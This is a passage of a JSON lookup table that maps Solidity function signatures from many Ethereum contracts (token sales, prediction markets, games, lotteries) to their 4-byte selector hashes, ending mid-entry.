"baseDonation()": "0x625cc465", "basePayment()": "0xc6502da8", "gracePeriod()": "0xa06db7dc", "relayTx(bytes,int256,int256[],int256,int256)": "0x318a3fee", "vote(bytes32,bool)": "0x9f2ce678", "_compare(int256,bytes2,int256)": "0xc976bbbb", "FutureBlockCall(address,uint256,uint8,address,bytes4,bytes,uint256,uint256,uint16,uint256,uint256)": "0xcdda62ad", "FutureCall(address,uint256,uint16,address,bytes4,bytes,uint256,uint256,uint256)": "0x2812f8b8", "sendSafe(address,address,uint256)": "0x528eedcb", "scheduleCall(address,bytes4,bytes,uint16,uint8,uint256[5])": "0x0ce46c43", "scheduleCall(bytes4,bytes,uint16,uint8,uint256,uint256,uint256,uint256,uint256)": "0x938c4307", "scheduleCall(address,bytes4,bytes,uint256,uint256,uint8,uint256)": "0x4c471cde", "scheduleCall(address,bytes4,bytes,uint8,uint256[4])": "0x7b55c8b5", "scheduleCall(bytes4,bytes,uint256,uint256,uint8,uint256)": "0xb549793d", "scheduleCall(address,uint256,bytes4,uint256,uint256,uint8,uint256)": "0x03d22885", "scheduleCall(bytes4,uint256,uint256,uint8,uint256)": "0xe29fb547", "scheduleCall(address,bytes4,bytes,uint256,uint256,uint8)": "0xee77fe86", "scheduleCall(address,uint256,bytes4,uint256,uint256,uint8)": "0x64ee49fe", "scheduleCall(bytes4,uint256,uint256,uint8)": "0x3a9e7433", "scheduleCall(address,bytes4,bytes,uint256,uint256)": "0x9772c982", "scheduleCall(bytes4,bytes,uint256,uint256)": "0x5a9f2def", "scheduleCall(bytes4,uint256,uint256)": "0x8c0e156d", "scheduleCall(address,bytes4,uint256,bytes,uint256)": "0x346cabbc", "scheduleCall(address,bytes4,bytes,uint256)": "0x48f05187", "scheduleCall(bytes4,bytes,uint256)": "0x3d9ce89b", "scheduleCall(bytes4,uint256)": "0xc43d0575", "scheduleCall(address,bytes4,uint256,bytes)": "0x795b9a6f", "scheduleCall(address,bytes4,bytes)": "0xa1c0539d", "scheduleCall(address,uint256,bytes4)": "0x3c2c21a0", "scheduleCall(address,bytes4)": "0x373a1bc3", "scheduleCall(bytes4)": "0x4db3da83", "scheduleCall(bytes4,bytes)": "0x0e850239", "setMany(uint256,int256,uint256,bytes20,address,bytes)": "0xf2da67db", "setBytes32(bytes32)": "0xc2b12a73", "registerData(address,int256,bytes32,address)": "0x73b55eaf", "registerMany(address,uint256,int256,uint256,bytes20,address,bytes)": "0x741e2345", "registerBytes32(address,bytes32)": "0x30fd300f", "scheduleCall(address,bytes4,uint256,uint256,uint8,uint256,uint256)": "0x8b676ae8", "scheduleCall(address,bytes4,uint256,uint256,uint8,uint256)": "0x68402460", "scheduleCall(address,bytes4,uint256,uint256,uint8)": "0x049ae734", "scheduleCall(address,bytes4,uint256,uint256)": "0x480b70bd", "scheduleCall(address,bytes4,uint256)": "0x01991313", "eventOracles(bytes32,uint256)": "0xfcf0f55b", "setOutcome(bytes32,bytes32[])": "0xc71e48d6", "ultimateOutcomes(bytes32)": "0xc25e6908", "getUltimateOutcomes(bytes32[])": "0xa0ec4e09", "getShares(address,bytes32[],int256[])": "0x98f3b81a", "withdraw(bytes32)": "0x8e19899e", "setUltimateOutcome(bytes32)": "0x8aa6f1b1", "voteForUltimateOutcome(bytes32,uint16)": "0x7b395487", "challengeWinningOutcome(bytes32,uint16)": "0x6b1e564a", "getOracleOutcomes(bytes32[],address[])": "0x659fb968", "oracleOutcomes(bytes32,address)": "0x4ad07b0e", "shares(address,bytes32,int256)": "0x488b3538", "descriptionHashes(bytes32)": "0x3ced516c", "getFee(bytes32[])": "0xc91d7e9c", "registerEvent(bytes32[])": "0xc1b06513", "getOutcome(bytes32)": "0x5d1a3b82", "isOutcomeSet(bytes32)": "0x51017702", "getEventData(bytes32)": "0x13fc6ac2", "changeBaseFee(uint256)": "0xeff6be2f", "calcBaseFeeForShares(uint256)": "0xc51cf179", "getEvents(bytes32[],address)": "0xc10dd4c6", "createEvent(bytes32,bool,int256,int256,uint8,address,address,bytes32[])": "0xb11e3b82", "redeemWinnings(bytes32)": "0xa4a7cf5c", "getEventHashes(bytes32[])": "0x9ba5b4e9", "getEvent(bytes32)": "0x8c172fa2", "revokePermanentApproval(address)": "0x57bcccb6", "permitPermanentApproval(address)": "0x481b659d", "getShares(address,bytes32[])": "0x428d64bd", "redeemAllOutcomes(bytes32,uint256)": "0x4025b293", "calcBaseFee(uint256)": "0x3983d5c4", "getEventTokenAddress(bytes32,uint256)": "0x1f0c1e0c", "changeDAO(address)": "0x1d007f5f", "isPermanentlyApproved(address,address)": "0x1934d55a", "getBaseFee()": "0x15e812ad", "buyAllOutcomes(bytes32,uint256)": "0x07d5b826", "withdrawFees(bytes32)": "0xebb71194", "sellShares(bytes32,uint8,uint256,uint256)": "0xdb833e3a", "getMarket(bytes32)": "0xc3c95c7b", "createMarket(bytes32,uint256,uint256,address)": "0xc1fd4339", "numBarriersPerBoard()": "0xd7ecba0c", "buyXname()": "0xbdaacabd", "chargeBalance()": "0x36b3da05", "BTL_IMMORTAL()": "0x2113aab4", "dividendFund()": "0x1a06008a", "preicoContractAddress()": "0xaf356eee", "numRegistered()": "0xc96e5627", "transperrun()": "0xc0d9f997", "airdropLimit()": "0x3c775b08", "tokenConverter()": "0xa67aee1f", "fundTransferred()": "0x67a7390d", "toSendFromStorage()": "0x2c42f2e8", "logsCount()": "0xcd1f8393", "icoBackend()": "0x1f6a3943", "vestingHasStarted()": "0xbb7a6dba", "expireDate()": "0xb8a67c3c", "intervalNow()": "0x4059240c", "pwin()": "0xa96a5a5b", "tokencap()": "0x023c6042", "HTX()": "0xe3069e4d", "maximumBuyBackAmountInWEI()": "0x4e93bf32", "updateICOStatus()": "0x02299496", "earlyInitProjectSupply()": "0x9c4e3788", "partnersFund()": "0x926f0c7b", "multisignature()": "0xce794294", "coreTeamUnlockedAt()": "0x629a9ce7", "getPaycarnita()": "0xc28f812c", "testwallet8()": "0x1c90e9cf", "endingTimestamp()": "0x5e5294b7", "min_investment_presale_eth()": "0x27e65007", "refundIsAvailable()": "0x061303a7", "JACKPOT_CHANCE()": "0x9f530cc9", "icoSoftCap()": "0xae52026f", "stage3_price()": "0x16bdb7b6", "REQUIRED_SIGNATURES()": "0x9ac18b19", "thirdStageMinted()": "0x4e07a7a5", "nPlatCurTotalEth()": "0x97ecd379", "expiryBlock()": "0xbf624273", "ICDStartTime()": "0x73107c99", "requiredPeriodSeconds()": "0x6b40bba1", "friendsFingersRatePerMille()": "0xe7fac728", "UNSOLD_ALLOCATION_EXPONENT()": "0x4499e043", "CAPPED_SUPPLY()": "0xcceda56c", "candidateETHAssets()": "0xec79efa8", "totalPlay()": "0x6f10fdbd", "firstAuctionsReferrer()": "0xea680080", "liquidityPool()": "0x665a11ca", "exchangeRateOracle()": "0xffffce47", "RESERVED_TOKENS_FOR_ROI_ON_CAPITAL()": "0x6fb8b885", "weiRaisedRound()": "0x54ec5d9b", "answer()": "0x85bb7d69", "foundersFund()": "0xc440008e", "organizer2()": "0x4b28a674", "MilestoneInput()": "0x320a5018", "battles()": "0x47aef0a9", "STARTING_CAT()": "0x30347537", "levelTwoBonus()": "0xdb478d08", "icoSaleHardCap()": "0x083eb6f8", "FIXED_PRESALE_USD_ETHER_PRICE()": "0xa58079fc", "numberOfAdmins()": "0x81395866", "airDropCount_()": "0x4ca15352", "TEAM_PERCENT_GZE()": "0x0d50266c", "receivedEth()": "0xf5632ab4", "advisorCut()": "0xd1cd19cf", "CeoAddress()": "0x0b869824", "icoBonus1EndDate()": "0x9ceb5c6d", "soldTokensWithoutBonus()": "0xd72e2b78", "ROLE_MULTIOWNER()": "0xa10c0fd5", "fee_balance()": "0x1769f049", "adminAllowance()": "0xd56de6ed", "total_SDCC_supply()": "0x36dc58f6", "withdrawEtherToReserveEscrow()": "0xfcc648f6", "frozenRate()": "0x9e243259", "Wp()": "0xd5d66031", "sumAcceptedContrib()": "0xdc382cbf", "refundDeadlineTime()": "0x09648181", "multisig_owner()": "0x3f6dd911", "addr1()": "0xeabe09ad", "tokenAllocation()": "0x58525fda", "parachute()": "0x76e4f921", "maxIco()": "0xef9c52ea", "END_SKO1_UNITS()": "0xcc897e40", "windowLength()": "0x7c70b205", "lockedYears()": "0xa9b2c135", "teamStakesFrozen()": "0xedef8bdd", "periodITO_wei()": "0x87b15c0b", "tokensForCrowdsale()": "0x8bccae3f", "lockedTeamAllocationTokens()": "0x49a8d337", "undestroyable()": "0x6a53ab64", "upgradeFee()": "0x40fa61f7", "starsRemainingToAssign()": "0xd67601ac", "nextRewardPlayNo()": "0x692cd610", "founder1Address()": "0x28fe9a7f", "oneStepRate()": "0x19c5ef1b", "ERC20Address()": "0xa6021ace", "costToCallOraclizeInWei()": "0xfec5438c", "currSaleActive()": "0x379ba3b7", "hardCapSale()": "0x4f36fec8", "bonusFirstWeekPeriod()": "0x7696cf52", "gameStartTime()": "0x0252b995", "minFee()": "0x24ec7590", "payoutTotal()": "0xcff4d6cd", "askHash()": "0x0b0a4b17", "calculateInterestDue()": "0x1070eb4f", "confirmSwap()": "0xcb9854a2", "isContractActive()": "0x8f5949f9", "EMISSION_FOR_SALESTAGELAST()": "0x005733e6", "rateC()": "0xfa8a3c1c", "tokenMinter()": "0xcfb3647b", "founderLockEndTime()": "0xe282938d", "lunetReserve()": "0xe90ab7fe", "BONUS_BATCH()": "0x578c6642", "walletEhterCrowdsale()": "0x764ea3fe", "PERIOD_BLOCKS()": "0xaf2780ee", "mintValue()": "0x89c77dfe", "added_to_the_bank()": "0x15e1c65c", "REGULAR_CATEGORY()": "0xca5b8a52", "seizedTokensWallet()": "0x17e398a5", "lastJackpotPayout()": "0x7e6688a2", "ROUND_5_PRESALE_BONUS()": "0xd93da7f0", "TOKEN_SECOND_DISCOUNT_MULTIPLIER()": "0xf4ee82ee", "maxReferrals()": "0x747fc0d2", "tokenDistributionStartTime()": "0x8d0a73e3", "costOfOneToken()": "0x9d8a0212", "amountClaimed()": "0xad6b5d04", "fundStorageVaultAddr()": "0xb62596a2", "DEVELOPERSFUND()": "0x07efbf2b", "kingSpirit()": "0x4fcb2968", "lastInflationUpdate()": "0x6b4e8bb0", "buyBackFund()": "0xc9ce624f", "lastBlock_a18Hash_uint256()": "0xe7416f01", "buyItem1()": "0x2b88c42d", "lastPeriodChange()": "0x02d2f349", "maxSupplyForEra()": "0x4fa972e1", "preDistriToAcquiantancesStartTime()": "0xd1c332c7", "MAX_QUANTITY()": "0xe41ee46a", "currentSaleLimitPerAddress()": "0x2ca1aa16", "nextSnapshotTime()": "0xa89cdad9", "secondStageMintingDate()": "0xc51226b3", "scaledDividendPerToken()": "0x95c9f53f", "isCanSell()": "0x377b2009", "kyberHash()": "0xfe54b5fc", "currentGameNumber()": "0xa4516fad", "getUnprocessedQueryCount()": "0x9705a592", "gameGiftLineTime()": "0x7d902311", "currentOwnerFeePercent()": "0xf45c85e5", "getStageSupplyLimit()": "0x6d05cef4", "sendTokensToHold()": "0x22a92c45", "walletTokenBounty()": "0xa6988576", "BRANDS_ADDR()": "0xcf991259", "AIRDROP_MAX()": "0x05d1fc5d", "nonFungibleRegistry()": "0x2be79833", "bank1()": "0xda11f709", "accumulateFee()": "0x1155d042", "MIN_CARD_PRICE()": "0xad2a9c5f", "paymentSizeC()": "0xd237bc74", "gba()": "0xc6a52959", "phase_4_rate()": "0xdebf5b9f", "isCrowdFundActive()": "0x317c1291", "MAX_NUMBER()": "0xfea9b572", "ETH_TO_WEI()": "0x34854101", "lowestDiff()": "0x03b62e10", "balancesQuantity()": "0x2322f484", "bch()": "0x596c0531", "GEN0_TOTAL_COUNT()": "0x16b64898", "totalTokenIssued()": "0x60ce03d5", "saleRate()": "0x40557cf1", "getNumSuppliers()": "0x1d34cf60", "isPublicTokenReleased()": "0x99777d9d", "leadingBid()": "0x074b5270", "grace()": "0x1eefddb1", "bankBalance()": "0x28657aa5", "ETHEAL_UNIT()": "0x8f382a00", "NUM_COUNTRIES()": "0x2436b1d2", "builtOn()": "0xb60b7084", "minimum_cash_proof_amount()": "0x1ff42195", "mintPartnershipTokens()": "0x36a6ad58", "TOTAL_APC_SUPPLY()": "0x985d43f1", "FundingStageNum()": "0x82d29195", "currentYear()": "0x0b5a006b", "Prosperity()": "0x963632d3", "saleController()": "0x1e1ddacc", "percentage_of_three()": "0xdabb6360", "currentGene()": "0xcc135555", "OPEN_SALE_STAKE()": "0x91aadff6", "dateMainEnd()": "0x3bba340c", "icoEndTimestamp()": "0xb793233b", "metadata()": "0x392f37e9", "max_investment_eth()": "0xde9b9364", "REAPER_INTREPID_FTL_SPEED()": "0x74d33745", "emergencyProtectedMode()": "0x1dd637d8", "loyaltyPart()": "0x9295d038", "PHOENIX_CORSAIR_FTL_SPEED()": "0x6b88719a", "OPSPoolAddress()": "0xf54d28ae", "EmergencyFundingReleaseApproved()": "0xf00e4129", "totalLocked()": "0x56891412", "projectTokens()": "0x17888efc", "tokenAccountAddress()": "0xb0c2ff43", "proxydeposit()": "0x2e9c135b", "RESERVATION_CAP()": "0xa13f9e58", "defrostAdvisorsTokens()": "0xc986cf7c", "canDefrostAdvisors()": "0x57ef58c1", "defrostReserveAndTeamTokens()": "0x0bbd4e38", "canDefrostReserveAndTeam()": "0x1da83eab", "elapsedMonthsFromICOStart()": "0x5600e827", "NaviToken()": "0x1bd5d127", "numberOfDeployedTokens()": "0x5cd3b917", "deployBTTSTokenContract(string,string,uint8,uint256,bool,bool)": "0x08796ea0", "nextNonce(address)": "0x0cd55abf", "transferable()": "0x92ff0d31", "mintable()": "0x4bf365df", "accountLocked(address)": "0x500b9426", "transferOwnershipImmediately(address)": "0x7e71fb09", "BTTSToken(address,string,string,uint8,uint256,bool,bool)": "0x35fa3128", "signedApproveAndCall(address,address,uint256,bytes,uint256,uint256,bytes,address)": "0xf16f9b53", "signedApproveAndCallCheck(address,address,uint256,bytes,uint256,uint256,bytes,address)": "0x965b0cc4", "signedApproveAndCallHash(address,address,uint256,bytes,uint256,uint256)": "0x05a5f830", "signedTransferFrom(address,address,address,uint256,uint256,uint256,bytes,address)": "0x344bcc7d", "signedTransferFromCheck(address,address,address,uint256,uint256,uint256,bytes,address)": "0xf30d4d3f", "signedTransferFromHash(address,address,address,uint256,uint256,uint256)": "0x1a2b3adf", "signedApprove(address,address,uint256,uint256,uint256,bytes,address)": "0xe9afa7a1", "signedApproveCheck(address,address,uint256,uint256,uint256,bytes,address)": "0xc7a86e33", "signedApproveHash(address,address,uint256,uint256,uint256)": "0x1296d47d", "signedTransfer(address,address,uint256,uint256,uint256,bytes,address)": "0x7532eaac", "signedTransferCheck(address,address,uint256,uint256,uint256,bytes,address)": "0x7c0fbc31", "signedTransferHash(address,address,uint256,uint256,uint256)": "0x96cfd124", "WEC()": "0xc4576525", "EthPriceProvider()": "0x18c3cf34", "PriceProvider(string)": "0x5f5404af", "setBtcPriceProvider(address)": "0x7119a490", "receiveBtcPrice(uint256)": "0x3c8d284b", "CryptoPainting()": "0xa51548a1", "QKCCoin()": "0x9204c013", "MoralityAI()": "0x12c6651c", "collect(address[],uint256[])": "0x873ebe6a", "airdropAmounts(address[],uint256[])": "0xa17feadb", "transferRegion(uint256,uint256,address)": "0x7c61d567", "setImageDataCloud(uint256,uint256,string)": "0x12bd2cea", "unsetRegionForSale(uint256,uint256)": "0xc17ffac6", "unsetSectionForSale(uint256)": "0x4f617b81", "setSectionForSaleToAddress(uint256,uint256,address)": "0x6f872022", "setRegionImageDataCloud(uint256,uint256,uint256,string)": "0xc84a8766", "setRegionForSaleToAddress(uint256,uint256,uint256,address)": "0x7e83027f", "setRegionForSale(uint256,uint256,uint256)": "0x6a7625ca", "setSectionForSale(uint256,uint256)": "0x4f1a892b", "buyRegion(uint256,uint256,uint256,string)": "0x5ebfed78", "buySection(uint256,uint256,string)": "0x73da968d", "regionAvailable(uint256,uint256)": "0x50bc373d", "sectionPrice(uint256)": "0xd960ede1", "sectionForSale(uint256)": "0xae35707d", "sectionAvailable(uint256)": "0x6da05cc7", "getIdentifierFromSectionIndex(uint256)": "0xafcd6561", "getSectionIndexFromIdentifier(uint256,uint256)": "0x3498b00f", "getSectionIndexFromRaw(uint256,uint256)": "0x662e3470", "updateIPOPrice(uint256)": "0xc6114aaf", "updatePixelIndex(uint16,uint16)": "0xc65a0fdf", "Pixel()": "0x99aa5d97", "setRNGCallbackGasPrice(uint256)": "0x720c142d", "setRNGCallbackGas(uint256)": "0xf7b95d35", "processDiceRoll(address,uint256)": "0x78fc52b3", "erc20VGC(uint8)": "0x4611636e", "setExchangeRates(uint256)": "0x1040762d", "getLevel(address)": "0x817c8966", "setLevel(uint256)": "0x27a5428b", "TEC()": "0x7ce65725", "LAB()": "0x9f2b03b6", "TomSkin()": "0xbbb906f7", "doTransfer(address,address,uint256,uint256)": "0x623659b4", "FRPToken()": "0xe57ebc0f", "OpticalNetwork(address)": "0x0e687501", "PTL()": "0x259b5605", "CyberyTokenSale()": "0x336ce69e", "setSecondWalletPercent(uint256)": "0xc59e0b87", "setSecondWallet(address)": "0x2fc8124d", "clearBonuses()": "0x8c65f15d", "insertBonus(uint8,uint256,uint256)": "0x59c140be", "changeBonus(uint8,uint256,uint256)": "0x5ad9ca10", "removeBonus(uint8)": "0xd99727cc", "bonusesCount()": "0xe19bc813", "_split(uint256)": "0x1b131bbd", "setTokenSwarmHash(address,bytes)": "0x56318820", "setTokenIpfsHash(address,bytes)": "0xeef05f65", "addToken(address,string,string,uint8,bytes,bytes)": "0xa880319d", "offlineSales(uint256,uint256)": "0xd438fdbd", "ZeePinToken(address,address,uint256,uint256,uint256,uint256,uint256,uint256)": "0xa153b399", "GOLD()": "0x3e4bee38", "getCurrentOwnerBallence()": "0x1369f6fd", "MANHATTANPROXY7THAVE()": "0x12bb65ca", "sendToInvestor(address,uint256)": "0xb0b189ca", "setPriceForBasePart(uint256)": "0xe52d0659", "setByuoutCount(uint256)": "0xc5f70682", "setByuoutActive(bool)": "0xc53f926b", "setDistributorAmount(address,bool,uint256)": "0x53613769", "setDistributor(address,bool,uint256)": "0x9cda1ec5", "OilVisionShare()": "0x96a51fde", "FinalToken(uint256,string,string)": "0x829981fb", "withdraw(address[],uint256[],address[])": "0x7970785d", "setWithdrawCreator(address)": "0x7c3a1d32", "removeAuthorized(address,address)": "0x0e1e1d0f", "addAuthorized(address,address)": "0xb446b5aa", "Bitstarti(uint256,string,string)": "0xc90f34f0", "EQUITRADER()": "0xd3a5dcb0", "Tzedakah()": "0x41f31724", "BOXEX()": "0x499cf7ce", "theRelayer(address)": "0x2007474e", "a_viewCoinSupplyAndFunding(bool)": "0xc03d00f3", "a_viewSellOffersAtExchangeMacroansy(address,bool)": "0x8209d121", "wadmin_withdrawFund(uint256)": "0xeee3671b", "wadmin_burn(uint256,bool)": "0xa44e09db", "sellCoinsToICO(uint256)": "0xfbb5d52d", "redeemCoinsToICO(uint256)": "0xe42996d1", "buyCoinsPreview(uint256)": "0x6bbe6f7f", "buyCoinsAtICO()": "0xe9fcc787", "wadmin_freezeAccount(address,bool)": "0x0d4a8b3b", "wadmin_setContrAddr(address,address)": "0x9b0646f6", "wadmin_transferOr(address)": "0x48c1ee9b", "TokenMacroansy()": "0x0a3b7d9b", "GoldiamICO()": "0x314dd783", "GoldiamToken()": "0x0561d562", "getPublicSupply()": "0x73cbd8ce", "grantReserveToken()": "0x6fb65c7f", "bountyFunds()": "0x36cbee23", "TheGreatWishOfChina()": "0x45b7fdd4", "ROHH(uint256,string,string)": "0x743b8e1a", "DanatCoin()": "0x07a2c4d5", "pow_10(uint256)": "0xed5d3f1a", "root_10(uint256)": "0x5903eff2", "buyTokensGrowthLife()": "0x034cd0b0", "buyTokensReserve()": "0xcc15c26c", "votesFor(address)": "0xa50cd8e7", "eligibleVotes(address)": "0xbad84416", "totalEligibleVotes()": "0x523f891c", "YupieToken()": "0x9023c993", "CharityCommonweal(uint256,string,uint8,string)": "0x59296490", "HRChainERC20()": "0x1e4df315", "LIDToken()": "0x913d30b0", "SAATCoin()": "0x56084329", "balanceOfContract()": "0xe6c7c456", "isFreezing(address)": "0xffa34f7c", "activeTransfer()": "0x12e56faf", "addWhitelistedTransfer(address,address)": "0xd48c4193", "OriginSportToken(address)": "0x44804664", "InitBalanceFrom961e593b36920a767dad75f9fda07723231d9b77(address,uint256)": "0x1af8c18a", "ActualizePrice(uint256,uint256,uint256,uint256)": "0xdf09176b", "AbabPreICOToken()": "0x92b863f3", "UBC()": "0x5b1c893a", "numberOfNarcosByDistrict(uint8)": "0x7373af84", "narcosByDistrict(uint8)": "0xbef19a8b", "doHijack(uint256,uint256,uint256,uint256)": "0x2eb95fd4", "hijack(uint256,uint256)": "0x5374eec3", "busted(uint256,uint256,uint256,uint256)": "0x9e75c483", "travelTo(uint256,uint256)": "0x8261cfe4", "sellItem(uint256,uint256,uint256,uint256)": "0xa0071552", "buyItem(uint256,uint256,uint256,uint256)": "0x8841ac11", "_distributeRevenue(uint256,uint256,uint8,uint8)": "0xb42a8bf9", "setLocalRevenuPercent(uint256)": "0x6e287154", "distributeRevenue(uint256,uint8,uint8)": "0x9b8430eb", "floatEconony()": "0xbe80dcfd", "getNarcoHomeLocation(uint256)": "0xd29d91ca", "getNarcoLocation(uint256)": "0x5b42109d", "increaseDistrictCoke(uint256,uint256)": "0xdb29fd6e", "increaseDistrictWeed(uint256,uint256)": "0xc3645759", "createNamedDistrict(uint256,string,bool)": "0x1aa44efd", "getDistrict(uint256)": "0x22776478", "DistrictsCore()": "0xb5932ee2", "configureMarketItem(uint256,uint8,uint8,uint8,string)": "0x73f8edc3", "isDopeRaiderDistrictsCore()": "0x6237564c", "setDevFeePercent(uint256)": "0x379e2919", "setSpreadPercent(uint256)": "0x2771083f", "setTravelPrice(uint256)": "0x640efb0d", "setHijackPrice(uint256)": "0x930db1ab", "setBustRange(uint256)": "0x88a55c8b", "setAirLiftPrice(uint256)": "0xa7419b51", "_setNarcosCoreAddress(address,address)": "0x9a05cd66", "setNarcosCoreAddress(address,address)": "0x8b14251f", "getRemainingCapacity(uint256)": "0x1b8ef0bb", "setCooldown(uint256,uint256,uint256)": "0x8b975028", "incrementStat(uint256,uint256)": "0xf63c5532", "updateSkill(uint256,uint256,uint16)": "0xd62f146b", "updateConsumable(uint256,uint256,uint8)": "0xcf5f87d0", "updateCokeTotal(uint256,bool,uint16)": "0x8ed5047c", "updateWeedTotal(uint256,bool,uint16)": "0xe7696a29", "getNarco(uint256)": "0x33f30a43", "TreasureCoin()": "0x6e2d53a6", "ClearToken(address,address,address,address,address)": "0xf8dd1764", "MultiSig(address[],uint256)": "0xa42e16fd", "distributeTKLN(address[],uint256)": "0xc3a48741", "WCT1(address)": "0x6befa297", "getCertificate(address)": "0xfd531e93", "createCertificate(string,string,string)": "0xac778b8f", "getCertificateKeys()": "0xf9937c2b", "MarriageCertificates()": "0xd932ed92", "FHCContract()": "0xe82d777c", "tokensToEther_(uint256)": "0x43245816", "etherToTokens_(uint256)": "0xecf56d82", "getDividendsOf_(address,bool)": "0x47c1caff", "transferFor_(address,address,uint256)": "0x320a6c73", "mintTokens_(address,uint256,address)": "0x4b603a83", "withdraw_(address)": "0x1d83e3a9", "sell_(address,uint256)": "0xd0a61995", "Cryptolotto1Day(address,address,address,address)": "0xed0bce14", "ManUvsTottenham()": "0xa97501a3", "forwardFundsToOwner()": "0xadf9a754", "transferFromOwner(uint256)": "0xddd1527b", "ApolloCoinTokenSale(uint256,uint256,uint256)": "0x481fcbf4", "ApolloCoinToken(uint256,uint256,address,address)": "0x83da4d86", "StandardCrowdsale(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,address)": "0xdddff84c", "AVINCOIN()": "0x0c06fda1", "B3(uint256,string,uint8,string)": "0xa2a3d051", "weR()": "0xff64d469", "setApprovalForAllByContract(address,address,bool)": "0xb28945a5", "isMarketplace()": "0xf4b86c48", "distributeTokensToRank(uint256[],uint256)": "0x4341aebc", "generateInitialCard(uint16)": "0xa14cf394", "updateAvatar(uint256,uint256)": "0x7a70abda", "generateHash()": "0xd11831c3", "_createCard(address,uint16)": "0x0121be14", "_isChallengerAttackFirst(uint256,uint256)": "0xc5a6732b", "_rollCriticalDice()": "0xa593845f", "_transferFees(uint256,uint256[],uint256)": "0x53601ec5", "_addBattleSequence(uint8,uint8,uint256)": "0x0564df4a", "_upgradeLevel(uint256,uint16,uint16,uint16,uint16,uint16,uint16,uint16)": "0xf0a42aa0", "levelUp(uint256,uint16,uint16,uint16,uint16,uint16,uint16)": "0x29aec173", "draftNewCardWithReferrer(address)": "0x9f91d145", "getCardIdByRank(uint256)": "0x9070222e", "setDeveloperCut(uint256)": "0xf6cf3a7d", "setAvatarFee(uint256)": "0xb61cb058", "setUpgradeFee(uint256)": "0xbae18ac3", "setChallengeFee(uint256)": "0x35bf82f6", "setCardDrawPrice(uint256)": "0x44d1a9ae", "setBattleStart(bool)": "0x809ae91e", "setStarterPackOnSale(bool)": "0x682bc77e", "setStarterPack(uint256,uint16)": "0x570200c0", "setSettingValues(uint8,uint8,uint16,uint16,uint16,uint16,uint16,uint8,uint8,uint32,uint32,uint8)": "0x1c70362c", "allWETHbalances(address,address[])": "0xd2ff5d4f", "allBalancesForManyAccounts(address[],address[])": "0x01afd5f3", "allAllowancesForManyAccounts(address[],address,address[])": "0xdf8344fe", "walletAllowances(address,address,address[])": "0x366dff9c", "INBCToken(uint256,string,string)": "0x835164a0", "renameMonster(uint64,string)": "0x8d1d22d8", "getMonsterCP(uint64)": "0x0672859b", "getMonsterCurrentStats(uint64)": "0x3c6e5927", "getMonsterBaseStats(uint64)": "0xd29cbd60", "triggerTransferEvent(address,address,uint256)": "0xc463b008", "setAddressWhitelist(address,bool)": "0xaf4c14ee", "setClassWhitelist(uint32,bool)": "0x4661bb98", "setOperationContracts(address,address,address)": "0x0afd548d", "_canTransfer(uint256,address)": "0xe321adb3", "_canOperate(address)": "0x16a3feca", "Protecthor()": "0x61851679", "issueTokens(address)": "0x3ff54c71", "updateMaxTokensToDistribute(uint256)": "0xe4fffb3a", "hasDNN(address)": "0x152b6f9a", "BlockContract()": "0xda0fab61", "getPlayerWithdrawal(uint256,uint256)": "0x4be02f32", "getDisplayGenVault(uint256)": "0x1f09b0a2", "migratePhraseData(uint256,uint256,uint256,uint256,uint256)": "0xe58ae45b", "migrateRoundData(uint256,uint256,bool,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x735bae84", "migratePlayerPhrasesData(uint256,uint256,uint256)": "0x7bb050cf", "migratePlayerRoundsData(uint256,uint256,uint256,uint256,uint256)": "0x684876a1", "migratePlayerData2(uint256,address,uint256,uint256,uint256,uint256)": "0x72f159b7", "migratePlayerData1(uint256,address,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x4f96decf", "migrateBasicData(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0xab840808", "RHToken()": "0xf2d578dc", "PRZTToken(uint256,string,uint8,string)": "0x2b1f7660", "CYFToken()": "0xc115b06c", "CashTelex()": "0x46d46a6a", "isProcessedTx(bytes32)": "0x15c5c950", "transferToken(bytes32,address,address,uint256)": "0xc5e974ed", "transferEth(bytes32,address,uint256)": "0x1b94413f", "refundToken(bytes32,address,address,uint256)": "0x28805407", "refundEth(bytes32,address,uint256)": "0xa2f56b2c", "initChargeJNT(address,string)": "0x43eb37e2", "setActionPrice(string,uint256)": "0x47f67eab", "setJntBeneficiary(address)": "0xc5af3808", "setJntController(address)": "0x7de5ad89", "chargeJNT(address,address,uint256)": "0xbed9d712", "isCrydrViewRegistered(string)": "0xd98de8a5", "isCrydrViewAddress(address)": "0xd372e3a0", "getCrydrViewAddress(string)": "0xbc40bac6", "removeCrydrView(string)": "0x6ec03f7a", "setCrydrView(address,string)": "0xe3a861a4", "setCrydrStorage(address)": "0x0c79e3e6", "emitApprovalEvent(address,address,uint256)": "0xf23b6fa2", "emitTransferEvent(address,address,uint256)": "0xa6d49dca", "isPermissionGranted(address,string)": "0x32a2fda7", "isManagerEnabled(address)": "0x9b53d87c", "revokeManagerPermission(address,string)": "0x7c0efb8b", "grantManagerPermission(address,string)": "0x822b08d0", "disableManager(address)": "0xd4859dc5", "enableManager(address)": "0x5ca5b334", "isManagerAllowed(address,string)": "0x0392d2b4", "createOwnershipOffer(address)": "0x9739db9d", "receiveToken(address,uint256,address,bytes)": "0xf8a6172e", "checkFrozen(address)": "0xa04a85c0", "bumpRound(uint256)": "0x805b8455", "changeRound(uint256,uint256,uint256,uint256)": "0xa5752034", "wedding()": "0x7d230dfd", "CyberClassicToken()": "0x91301852", "LianJieToken()": "0x7e0c240d", "EXACOIN(uint256,string,string)": "0x5e53e2f9", "getAmountWeekly(uint32)": "0xd4740b78", "generateOtherNums(uint8[4])": "0x0661f204", "genWeeklySecondPrizeKey(uint8[4])": "0xc0be4b51", "genDailySecondPrizeKey(uint8[4])": "0x1a399698", "generatePermutationKey(uint8[4])": "0x58d168b7", "generateCombinationKey(uint8[4])": "0x1e4146b0", "hasRepeat(uint8[4])": "0x6f4db6a7", "sort(uint8[4])": "0xe6f0beeb", "isValidBet(uint8[4])": "0x85a17a1a", "transferIncome(address,uint256)": "0x7b1c88be", "setGasConsume(uint256)": "0xab17bad0", "setJackpot(uint8[4])": "0x5aca6153", "getWeeklyJackpot(uint32)": "0xe9f89121", "getDailyJackpot(uint32)": "0x47cb1b35", "getAmountWeeklybyNum(uint32,uint8[4])": "0x9f4fae14", "getAmountDailybyNum(uint32,uint8[4])": "0xe7c77c80", "getSingleBet(uint32,uint32)": "0x521fd5be", "rewardWeekly(uint32,uint32)": "0xb09c0f30", "rewardDaily(uint32,uint32)": 